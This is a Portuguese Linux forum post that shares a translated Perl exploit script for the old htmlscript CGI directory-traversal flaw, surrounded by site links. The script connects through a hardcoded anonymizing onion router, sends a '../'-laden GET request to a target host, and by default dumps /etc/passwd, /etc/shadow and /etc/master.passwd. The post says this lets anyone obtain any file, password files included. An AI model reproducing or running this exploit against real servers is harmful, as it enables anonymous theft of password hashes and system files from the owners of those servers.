Testando servers a HTMLSCRIPT
Publicado por Douglas Vigliazzi 13/12/2002
[ Hits: 4.623 ]
Este script testa servidores à vulnerabilidade de HTMLSCRIPT, o qual permite a obtenção de qualquer arquivo, inclusive o passwd e shadow.
Esta falha compromete bastante a segurança.
#!/usr/bin/perl -w # $Id: htmlscript.pl,v 1.1 1998/01/29 06:28:52 zap Exp $ # # Obtém /etc/{passwd,shadow,master.passwd} ou qualquer arquivo de servers # vulneraveis à htmlscript. A requisição HTTP será feita através de um # roteador anonimo. # # Copyright (c) 1998 by zap <zap@arosnet.se> # Tradução Douglas Vigliazzi e adaptação # $Log: htmlscript.pl,v $ # Initial revision # use strict; use Socket; my ($verbose, $onion_router, $onion_port, $onion_timeout, $iaddr, $paddr, $proto, $line); $verbose = 1; $onion_router = "132.250.80.12"; $onion_port = 9200; $onion_timeout = 10; $iaddr = inet_aton($onion_router); $paddr = sockaddr_in($onion_port, $iaddr); $proto = getprotobyname("tcp"); my ($victim, $file) = @ARGV or die "Usar: httpscript.pl <host> [<arquivo>]\n"; sub get_file { $SIG{"ALRM"} = sub { close(ONION); }; alarm $onion_timeout; socket(ONION, AF_INET, SOCK_STREAM, $proto); select(ONION); $| = 1; select(STDOUT); if (connect(ONION, $paddr)) { $SIG{"ALRM"} = "IGNORAR"; print "[ $victim:$file ]\n" if $verbose; print ONION "GET http://$victim/cgi-bin/htmlscript?../../../", "../../../../..$file\n\n"; while (defined($line = <ONION>)) { print $line } } else { die "Erro: Conexão para roteador $onion_router esgotada ", " ($onion_timeout\s).\n"; } close(ONION); } if ($file) { get_file; } else { $file = "/etc/passwd"; get_file; $file = "/etc/shadow"; get_file; $file = "/etc/master.passwd"; get_file; }
Testando multiplos servers a ataque DoS
Nenhum comentário foi encontrado.
Como gerar qualquer emoji ou símbolo unicode a partir do seu teclado
Instalar e Configurar o Slackware Linux em 2025
Como configurar os repositórios do apt no Debian 12 em 2025
Passkeys: A Evolução da Autenticação Digital
Instalação de distro Linux em computadores, netbooks, etc, em rede com o Clonezilla
Configurando o Conky para iniciar corretamente no sistema
3 configurações básicas que podem melhorar muito a sua edição pelo editor nano
Como colorir os logs do terminal com ccze
Instalação Microsoft Edge no Linux Mint 22
Como configurar posicionamento e movimento de janelas no Lubuntu (Openbox) com atalhos de teclado
Instalar debian testing (13) "por cima" do debian 12 (2)
firefox nao guarda meus logins nos sites (0)
Erro de segmentação «Segmentation fault (core dumped)» ao retornar obj... (1)